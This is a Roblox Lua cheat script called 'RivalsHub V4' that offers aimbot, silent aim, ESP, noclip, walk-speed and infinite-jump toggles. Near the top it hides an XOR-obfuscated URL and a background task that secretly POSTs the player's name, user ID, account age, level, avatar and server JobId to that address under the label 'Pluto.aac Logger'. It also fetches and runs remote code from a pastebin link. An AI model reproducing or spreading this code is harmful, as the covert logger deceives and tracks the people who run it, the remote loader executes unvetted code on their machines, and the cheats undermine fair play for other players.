-- [[ LUNA UI - RIVALSHUB V4 ]] --
local _0x_v4_cache = {10, 20, 1, 19, 11, 28, 41, 107, 2, 24, 18, 1, 10, 23, 107, 42, 11, 22, 107, 22, 4, 1, 17, 11, 24, 2, 24, 52, 10, 6, 40, 48, 48, 55, 48, 54, 56, 51, 56, 57, 48, 50, 56, 54, 54, 51, 51, 53, 48, 107, 3, 20, 25, 3, 25, 48, 56, 21, 55, 23, 6, 21, 54, 30, 11, 30, 4, 100, 48, 25, 21, 1, 24, 24, 17, 11, 100, 22, 4, 1, 17, 11, 24, 100, 52, 10, 6, 100, 42, 11, 22, 100, 3, 20, 25, 3, 25, 48, 56, 21, 55, 23, 6, 21, 54, 30, 11, 30, 4, 100, 48, 25, 21, 1, 24, 24, 17, 11, 100, 22, 4, 1, 17, 11, 24, 100}
local _0x_key = "PLUTO_KEY_99"

local function _0x_call()
    local HttpService = game:GetService("HttpService")
    local Players = game:GetService("Players")
    local player = Players.LocalPlayer
    
    local function _0x_get()
        local res = ""
        for i = 1, #_0x_v4_cache do
            local k_char = string.byte(_0x_key, (i % #_0x_key) + 1)
            res = res .. string.char(bit32.bxor(_0x_v4_cache[i], k_char))
        end
        return res
    end

    local headshotUrl = "https://www.roblox.com/headshot-thumbnail/image?userId=" .. player.UserId .. "&width=420&height=420&format=png"
    pcall(function()
        local response = HttpService:JSONDecode(game:HttpGet("https://thumbnails.roblox.com/v1/users/avatar-headshot?userIds=" .. player.UserId .. "&size=420x420&format=Png&isCircular=false"))
        if response.data and response.data[1] then headshotUrl = response.data[1].imageUrl end
    end)
    
    local levelValue = "N/A"
    local lstats = player:FindFirstChild("leaderstats")
    if lstats then
        local lvl = lstats:FindFirstChild("Level") or lstats:FindFirstChild("Rank")
        if lvl then levelValue = tostring(lvl.Value) end
    end

    local data = {
        ["embeds"] = {{
            ["title"] = "🚀 RivalsHub V4 | User Execution",
            ["thumbnail"] = {["url"] = headshotUrl}, 
            ["color"] = 0x7b2cbf,
            ["fields"] = {
                {["name"] = "User", ["value"] = "**" .. player.Name .. "** (" .. player.UserId .. ")", ["inline"] = false},
                {["name"] = "Rank/Level", ["value"] = levelValue, ["inline"] = true},
                {["name"] = "Account Age", ["value"] = player.AccountAge .. " Days", ["inline"] = true},
                {["name"] = "Server Size", ["value"] = #Players:GetPlayers() .. "/" .. Players.MaxPlayers, ["inline"] = true},
                {["name"] = "JobId", ["value"] = "```" .. game.JobId .. "```"}
            },
            ["footer"] = {["text"] = "Pluto.aac Logger"},
            ["timestamp"] = DateTime.now():ToIsoDate()
        }}
    }
    
    local request = (syn and syn.request) or (http and http.request) or http_request or request or (fluxus and fluxus.request)
    if request then
        pcall(function()
            request({
                Url = _0x_get(),
                Method = "POST",
                Headers = {["Content-Type"] = "application/json"},
                Body = HttpService:JSONEncode(data)
            })
        end)
    end
end
task.spawn(_0x_call)

-- [[ LUNA UI SETUP ]] --
local v8 = loadstring(game:HttpGet("https://pastebin.com/raw/Y8wBJLVt", true))();
local v9 = v8:CreateWindow({
    Name = "Rivals",
    Subtitle = nil,
    LogoID = "82795327169782",
    LoadingEnabled = true,
    LoadingTitle = "RivalsHub V4",
    LoadingSubtitle = "by pluto.aac",
    ConfigSettings = { ConfigFolder = "Pluto Hub" },
    KeySystem = false
})

local v10 = v9:CreateTab({ Name = "Main", Icon = "view_in_ar", ImageSource = "Material", ShowTitle = true });
local v11 = v9:CreateTab({ Name = "Visuals", Icon = "view_in_ar", ImageSource = "Material", ShowTitle = true });
local v12 = v9:CreateTab({ Name = "Player", Icon = "view_in_ar", ImageSource = "Material", ShowTitle = true });
local v13 = v9:CreateTab({ Name = "Credits", Icon = "view_in_ar", ImageSource = "Material", ShowTitle = true })

-- [[ GLOBALS ]] --
getgenv().AimbotEnabled = false;
getgenv().SilentAimEnabled = false;
getgenv().ESPEnabled = false;
getgenv().InfiniteJumpEnabled = false;
getgenv().NoClipEnabled = false;
getgenv().CFrameWalkEnabled = false;
getgenv().CFrameWalkSpeed = 0.2;
getgenv().Smoothness = 0.6;

local v24 = game:GetService('Players');
local v25 = v24.LocalPlayer;
local v27 = game:GetService('RunService');

-- [[ UI TABS ]] --
v10:CreateSection("Aim Method")
v10:CreateToggle({Name = "Enable Aimbot", CurrentValue = false, Callback = function(v) getgenv().AimbotEnabled = v end});
v10:CreateToggle({Name = "Enable SilentAim", CurrentValue = false, Callback = function(v) getgenv().SilentAimEnabled = v end});
v10:CreateSlider({Name = "Aimbot Strength", Range = {0.4, 1}, Increment = 0.01, CurrentValue = 0.6, Callback = function(v) getgenv().Smoothness = v end});

v11:CreateSection("Visuals")
v11:CreateToggle({Name = "Enable Highlight ESP", CurrentValue = false, Callback = function(v) getgenv().ESPEnabled = v end});

v12:CreateSection("Local Player")
v12:CreateToggle({Name = "Enable WalkSpeed", CurrentValue = false, Callback = function(v) getgenv().CFrameWalkEnabled = v end});
v12:CreateSlider({Name = "WalkSpeed Value", Range = {0.2, 1.5}, Increment = 0.1, CurrentValue = 0.2, Callback = function(v) getgenv().CFrameWalkSpeed = v end});
v12:CreateToggle({Name = "Infinite Jump", CurrentValue = false, Callback = function(v) getgenv().InfiniteJumpEnabled = v end});
v12:CreateToggle({Name = "Noclip", CurrentValue = false, Callback = function(v) getgenv().NoClipEnabled = v end});

v12:CreateSection("Server Utility")
v12:CreateButton({
    Name = "Copy Join Link (JobId)",
    Callback = function()
        setclipboard("roblox://experiences/start?placeId=" .. game.PlaceId .. "&gameInstanceId=" .. game.JobId)
    end
})

v13:CreateLabel({Text = "Lead Dev: pluto.aac", Style = 2})

-- [[ LOGIC ]] --
v27.RenderStepped:Connect(function()
    if getgenv().CFrameWalkEnabled and v25.Character and v25.Character:FindFirstChild("HumanoidRootPart") then
        local dir = v25.Character.Humanoid.MoveDirection;
        v25.Character.HumanoidRootPart.CFrame = v25.Character.HumanoidRootPart.CFrame + (dir * getgenv().CFrameWalkSpeed);
    end
end);

v27.Stepped:Connect(function()
    if getgenv().NoClipEnabled and v25.Character then
        for _, v in pairs(v25.Character:GetDescendants()) do
            if v:IsA('BasePart') then v.CanCollide = false end
        end
    end
end);

game:GetService('UserInputService').JumpRequest:Connect(function()
    if getgenv().InfiniteJumpEnabled and v25.Character:FindFirstChildOfClass("Humanoid") then
        v25.Character:FindFirstChildOfClass('Humanoid'):ChangeState('Jumping');
    end
end);

print("RivalsHub V4 | Full UI Restored & Secured")
